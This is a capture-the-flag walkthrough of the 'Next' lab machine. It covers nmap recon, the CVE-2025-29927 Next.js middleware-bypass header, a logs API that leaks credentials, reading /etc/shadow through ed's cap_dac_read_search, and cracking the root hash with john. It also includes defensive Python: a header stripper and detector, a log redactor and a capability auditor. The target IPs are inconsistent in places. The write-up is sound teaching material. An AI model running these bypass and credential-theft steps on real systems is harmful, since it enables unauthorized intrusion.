Next

Target description

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:05 CST
Nmap scan report for 192.168.2.1
Host is up (0.00071s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00036s latency).
MAC Address: 08:00:27:F8:17:C0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.13
Host is up (0.00053s latency).
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Target IP: 192.168.2.70

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:15 CST
Nmap scan report for 192.168.2.13
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.00 seconds

Open ports: 22, 80, 3000

(2) Service and version scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:16 CST
Nmap scan report for 192.168.2.13
Host is up (0.00049s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: Next.js
| ETag: "wvpz46leg16iz"
| Content-Type: text/html; charset=utf-8
| Content-Length: 8460
| Vary: Accept-Encoding
| Date: Sun, 14 Sep 2025 15:16:23 GMT
| Connection: close
| <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title class="jsx-1eb51da0ac6ad36f">maze-sec | Cybersecurity Research</title><link rel="icon" href="/favicon.ico" class="jsx-1eb51da0ac6ad36f"/><meta name="hint" content="Authorized access at a secret endpoint. Try 2025." class="jsx-1eb51da0ac6ad36f"/><meta name="next-head-count" content="5"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><scr
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Allow: GET
| Allow: HEAD
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| X-Powered-By: Next.js
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sun, 14 Sep 2025 15:16:23 GMT
| Connection: close
| <!DOCTYPE html><html><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>405: Method Not Allowed</title><meta name="next-head-count" content="3"/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-6805d7a71c2d770b.js" defer=""></script><script src="/_next/static/chunks/main-c396fbccb3dec4e9.js" defer=""></script><script src="/_next/static/chunks/pages/_app-dc14f8483464b560.js" defer=""></scri
| Help, NCP:
| HTTP/1.1 400 Bad Request
|_ Connection: close
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
  1. Port 22: SSH
  2. Port 80: HTTP
  3. Port 3000: reported as ppp, but the fingerprint shows an HTTP response with X-Powered-By: Next.js, so this is most likely a Node.js application

(3) UDP scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:17 CST
Nmap scan report for 192.168.2.13
Host is up (0.00034s latency).
All 100 scanned ports on 192.168.2.13 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.53 seconds

No open UDP ports.

(4) Vulnerability script scan

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# nmap --script=vuln -p22,80,3000 192.168.2.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-14 23:19 CST
Nmap scan report for 192.168.2.13
Host is up (0.00032s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
3000/tcp open ppp
MAC Address: 08:00:27:D7:C6:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.34 seconds

No new information.

II. Web penetration

1. Port 80

Visit port 80:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.13
No matter where life takes you, keep going NEXT.

Only a single sentence comes back; the capitalised "NEXT" hints that Next.js is involved.

2. Port 3000

Visit port 3000:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# curl http://192.168.2.13:3000
<!DOCTYPE html><html><head>
<meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title class="jsx-1eb51da0ac6ad36f">maze-sec | Cybersecurity Research</title><link rel="icon" href="/favicon.ico" class="jsx-1eb51da0ac6ad36f"/><meta name="hint" content="Authorized access at a secret endpoint. Try 2025." class="jsx-1eb51da0ac6ad36f"/>

Key information in the response:

  • The site is built on the Next.js framework
  • A hint in a meta tag: Authorized access at a secret endpoint. Try 2025.

3. Directory scanning

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# gobuster dir -u http://192.168.2.13:3000 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/admin (Status: 307) [Size: 18] [--> /secret-login-2025]
...

The path /admin was found; it redirects to /secret-login-2025.

III. Node.js framework vulnerability

Visiting /secret-login-2025 returns a login page.

Testing showed that this version of Next.js is affected by CVE-2025-29927.

1. How the vulnerability works

CVE-2025-29927 is a high-severity middleware logic bypass in the Next.js framework. By adding the HTTP request header x-middleware-subrequest: middleware, an attacker can skip the security controls implemented in middleware, such as authentication, path rewriting and CSP enforcement.
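The header named above is one Next.js uses only for its own internal sub-requests, so the defensive counterpart of this bug is simple: a reverse proxy in front of the application should never forward that header from the network, and every request that arrives carrying it should be alerted on. The following Python is an added example, not code from this write-up or from Next.js; the header name is the one in the text, while the proxy placement and the access-log format (common log fields plus the raw header value in a trailing quoted field) are assumptions made for the example.

```python
"""Edge-side handling of the Next.js internal header abused in CVE-2025-29927.

Added example, not code from the original write-up or from Next.js itself.
The header name comes from the text above; the proxy layout and the
access-log format are assumptions made for this example.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Next.js sets this header on its own internal sub-requests. A request that
# arrives from the network carrying it is either a bug or an attack, so a
# reverse proxy in front of the app should drop it and raise an alert.
INTERNAL_HEADER = "x-middleware-subrequest"


def strip_internal_headers(headers: Dict[str, str]) -> Tuple[Dict[str, str], bool]:
    """Return (cleaned_headers, was_present).

    Header names are compared case-insensitively, as HTTP requires, so
    'X-Middleware-Subrequest' is caught as well as the lowercase form.
    """
    cleaned: Dict[str, str] = {}
    was_present = False
    for name, value in headers.items():
        if name.lower() == INTERNAL_HEADER:
            was_present = True
            continue
        cleaned[name] = value
    return cleaned, was_present


# Assumed access-log format: the usual common-log fields followed by the raw
# value of the internal header in quotes ("-" when the client did not send it).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<subreq>[^"]*)"$'
)


def find_bypass_attempts(lines: Iterable[str]) -> List[dict]:
    """Return one record per logged request that carried the internal header.

    A 200 on a protected path is the interesting case: the middleware was
    skipped and the page was served. Lines that do not match the format are
    ignored rather than raising, so a partial log can still be scanned.
    """
    hits: List[dict] = []
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m or m.group("subreq") == "-":
            continue
        hits.append({
            "ip": m.group("ip"),
            "path": m.group("path"),
            "status": int(m.group("status")),
            "header_value": m.group("subreq"),
        })
    return hits


# Constructed sample log; the IPs, timestamps and sizes are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Sep/2025:23:20:01 +0800] "GET /admin/dashboard HTTP/1.1" 200 8460 "middleware"',
    '10.0.0.7 - - [14/Sep/2025:23:20:05 +0800] "GET / HTTP/1.1" 200 8460 "-"',
    '10.0.0.5 - - [14/Sep/2025:23:20:09 +0800] "GET /api/logs HTTP/1.1" 200 512 "middleware"',
    'not a log line',
]


if __name__ == "__main__":
    cleaned, seen = strip_internal_headers(
        {"Host": "maze-sec.local", "X-Middleware-Subrequest": "middleware"}
    )
    print("forwarded headers:", cleaned, "| alert:", seen)
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print("bypass attempt:", hit)
```

Stripping the header at the edge is a workaround, not a fix: the middleware in an unpatched application still trusts the header, so upgrading Next.js remains the actual remediation, and the log scan is what tells you whether the workaround was in place before anyone tried it.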


2. Exploitation

(1) Bypass the middleware to reach the login page

Use the vulnerability to get past the middleware restriction:

┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/secret-login-2025
<!DOCTYPE html><html>...
<title class="jsx-51c627a66454ffc6">Restricted Login | maze-sec</title>
...

The full login page is returned.

(2) Analyse the front-end code for credentials

Download and inspect the login page's JavaScript bundle:

┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/_next/static/chunks/pages/secret-login-2025-2d3e58ee9a68cbe4.js -o login.js

┌──(kali㉿kali)-[/mnt/hgfs/gx/x/tmp]
└─$ cat login.js | grep password
...console.log("Login attempt:",{username:r,password:c})...

The code shows that login attempts are written out with console.log, and that a successful login redirects to /admin/dashboard.

(3) Access the admin panel and read the logs

Continue using the vulnerability to reach the admin panel:

┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/admin/dashboard
...
<h3 class="jsx-11905641757d090">System Logs</h3>
<p class="jsx-11905641757d090">Review system activity (contains sensitive data).</p>
...

The panel exposes a system-log feature; query the log API directly:

┌──(kali㉿kali)-[/mnt/hgfs/gx/x]
└─$ curl -H "x-middleware-subrequest: middleware" http://192.168.205.190:3000/api/logs | grep password
...
"2025-09-12 10:07:12 - Successful login: c1trus with password MazeSecure@2025!"
"2025-09-12 10:20:09 - Database backup: user=c1trus_db_admin, pass=MazeDB2025!"
...

SSH credentials obtained:

  • Username: c1trus
  • Password: MazeSecure@2025!
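The log lines above are the whole foothold: the application wrote cleartext passwords into its log and then served that log to anyone who could reach /api/logs. The same class of mistake appears in the login bundle, which console.logs the submitted credentials. The Python below is an added example, not code from this write-up or from the target application: it shows the two log shapes seen above being redacted before storage, plus a check that counts how many lines needed redaction, which is the signal that some code path is logging secrets. The sample lines are constructed to mirror the leaked entries; the key names in the second pattern are my own list and not exhaustive.

```python
"""Redacting credentials from application log lines before they are stored
or served.

Added example, not code from the original write-up or from the target
application. The sample lines are constructed to mirror the shape of the
two entries the /api/logs endpoint returned above.
"""
import re
from typing import Iterable, List, Tuple

REDACTED = "[REDACTED]"

# The two shapes seen in the leaked log: free text ("... with password X")
# and key=value ("pass=X"). Group 1 keeps the label, the secret is dropped.
SECRET_PATTERNS = [
    re.compile(r"(?i)(\bwith password\s+)\S+"),
    re.compile(r"(?i)(\b(?:pass|password|passwd|pwd|secret|token|api_key)\s*=\s*)\S+"),
]


def redact(line: str) -> str:
    """Replace every secret value in a line with the REDACTED marker."""
    for pattern in SECRET_PATTERNS:
        line = pattern.sub(lambda m: m.group(1) + REDACTED, line)
    return line


def contains_secret(line: str) -> bool:
    """True if the line still carries something that looks like a credential.

    An already-redacted value is not counted, so this can be run on output
    as a final check before the log leaves the process.
    """
    for pattern in SECRET_PATTERNS:
        for m in pattern.finditer(line):
            if not m.group(0).endswith(REDACTED):
                return True
    return False


def audit(lines: Iterable[str]) -> Tuple[List[str], int]:
    """Redact a batch of lines; return (cleaned lines, number changed).

    A non-zero count is worth alerting on: the code that produced the line is
    writing credentials and should be fixed, not just masked.
    """
    cleaned: List[str] = []
    changed = 0
    for line in lines:
        new = redact(line)
        if new != line:
            changed += 1
        cleaned.append(new)
    return cleaned, changed


# Constructed sample lines shaped like the leaked entries.
SAMPLE_LOG = [
    "2025-09-12 10:07:12 - Successful login: c1trus with password MazeSecure@2025!",
    "2025-09-12 10:20:09 - Database backup: user=c1trus_db_admin, pass=MazeDB2025!",
    "2025-09-12 10:21:00 - Health check: ok",
]

if __name__ == "__main__":
    cleaned, changed = audit(SAMPLE_LOG)
    for line in cleaned:
        print(line)
    print(f"{changed} line(s) contained credentials")
```

Redaction is the safety net, not the design: a login handler has no reason to include the password in a log message at all, and the console.log in the front-end bundle should simply be removed from the production build.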

IV. Getting a shell as c1trus

Log in directly with the recovered credentials:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# ssh c1trus@192.168.2.13
...
$ id
uid=1000(c1trus) gid=1000(c1trus) groups=1000(c1trus)

V. Privilege escalation

1. Check sudo rights

$ sudo -l
Matching Defaults entries for c1trus on Next:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User c1trus may run the following commands on Next:
(ALL) NOPASSWD: /usr/bin/whoami

Only whoami can be run without a password.

2. Check SUID files

$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1

Nothing unusual found; these are all standard Debian SUID binaries.

3. Check files with capabilities

$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ed = cap_dac_read_search+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

/usr/bin/ed carries cap_dac_read_search+ep, a capability that lets the program bypass file read permission checks.

4. Use ed to read sensitive files

How the ed technique works

ed is a line editor. When it carries cap_dac_read_search it can read any file regardless of the file's permissions, and piping commands into it automates the read.
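From the defender's side, the finding above is a configuration audit item: a capability on a general-purpose editor is as good as root read access, and getcap -r / is cheap to run on every host. The Python below is an added example, not code from this write-up; it parses getcap output (both the older "path = caps" layout shown above and the newer "path caps" layout printed by recent libcap), then flags binaries whose effective or permitted set includes a capability that bypasses file permission checks or escalates directly. The sample text reproduces the three lines from the scan above; the risk table is my own and is not exhaustive.

```python
"""Audit file capabilities for ones that defeat file-permission checks.

Added example, not from the original write-up. The sample text reproduces the
three getcap lines shown above; the risk table and the reason strings are my
own and are not exhaustive.
"""
import re
import subprocess
from typing import Dict, List

# Capabilities that let a binary's caller bypass DAC or escalate outright.
HIGH_RISK: Dict[str, str] = {
    "cap_dac_read_search": "bypasses read and search permission checks (any file readable)",
    "cap_dac_override": "bypasses read, write and execute permission checks",
    "cap_setuid": "may switch to any uid, including root",
    "cap_setgid": "may switch to any gid",
    "cap_sys_admin": "broad administrative rights (mounts, namespaces, ...)",
    "cap_sys_ptrace": "may trace and inject into other processes",
    "cap_chown": "may change file ownership",
    "cap_fowner": "bypasses ownership checks on files",
}

# getcap output: older libcap prints "path = caps", newer prints "path caps".
ENTRY_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$")


def parse_getcap(text: str) -> List[dict]:
    """Parse getcap -r output into [{'path', 'caps', 'flags'}, ...]."""
    entries: List[dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        # "cap_a,cap_b+ep" or "cap_a,cap_b=ep": names before the operator,
        # flag letters (e/p/i) after it.
        parts = re.split(r"[+=]", m.group("caps"), maxsplit=1)
        names = parts[0]
        flags = parts[1] if len(parts) > 1 else ""
        entries.append({
            "path": m.group("path"),
            "caps": [c for c in names.split(",") if c],
            "flags": flags,
        })
    return entries


def find_risky(entries: List[dict]) -> List[dict]:
    """Return entries whose effective (e) or permitted (p) set contains a
    HIGH_RISK capability, with the reason attached."""
    risky: List[dict] = []
    for e in entries:
        bad = [c for c in e["caps"] if c.lower() in HIGH_RISK]
        if bad and any(f in e["flags"] for f in "ep"):
            risky.append({**e, "risky_caps": bad,
                          "why": [HIGH_RISK[c.lower()] for c in bad]})
    return risky


def run_getcap() -> List[dict]:
    """Run getcap -r / on a live host (needs libcap's getcap on PATH)."""
    proc = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                          text=True, check=False)
    return parse_getcap(proc.stdout)


# Copied from the getcap output in the write-up above.
SAMPLE = """\
/usr/bin/ed = cap_dac_read_search+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for r in find_risky(parse_getcap(SAMPLE)):
        print(f"{r['path']}: {', '.join(r['risky_caps'])} -> {'; '.join(r['why'])}")
```

On the sample input only /usr/bin/ed is reported; ping's cap_net_raw and the gstreamer helper's network capabilities are normal. The fix for the flagged entry is to drop the capability (setcap -r /usr/bin/ed) and, if some job genuinely needs to read protected files, give that capability to a dedicated, non-interactive binary rather than to an editor that will open whatever path it is handed.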

Read /etc/shadow

$ echo ",p\nq" | /usr/bin/ed /etc/shadow
941
root:$6$OkwDvceFhTabwVGQ$noxBcQ9o14G0cTyNdu9EBOoq3AmB660NS5Usr83oGcJNjxezZrwA/5ME3smPLzoizro5LRFqFKQlbO42l4rvt1:20343:0:99999:7:::
...
c1trus:$6$p/7V81X3jW.t4UVk$p0QwkfnPmVwKd5G45ABhShw/bdysk8cCAOF7a2AU/rKcpjFbmeGEN2Wq6AyXcLLgq3ldpBMWDg7VSupIzy7w4/:20343:0:99999:7:::

Command explanation:

  • ,p prints every line (from the first line to the last)
  • q quits the editor

5. Password cracking

Write the root user's hash to a file:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# echo 'root:$6$OkwDvceFhTabwVGQ$noxBcQ9o14G0cTyNdu9EBOoq3AmB660NS5Usr83oGcJNjxezZrwA/5ME3smPLzoizro5LRFqFKQlbO42l4rvt1' > hash

Crack it with john:

┌──(root㉿kali)-[~/miaosec/maze-sec]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bisrock (root)
1g 0:00:00:21 DONE (2025-09-15 23:09) 0.04601g/s 2733p/s 2733c/s 2733C/s blueboy1..062906
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Credentials recovered: root:bisrock

6. Getting root

$ su root
Password: bisrock
root@Next:/home/c1trus# id
uid=0(root) gid=0(root) groups=0(root)

VI. Flags

root@Next:/home/c1trus# cat /home/c1trus/user.txt /root/root.txt 
flag{user_d0cab90d8d20d57e2f2b9be52f7dd25d}
flag{root_8812662dcf3e5db0247c0f85909363fc}

Next
http://miao-sec.github.io/Maze-sec/Next/
Author
Miao
Published
January 9, 2026
License
BY-MIAO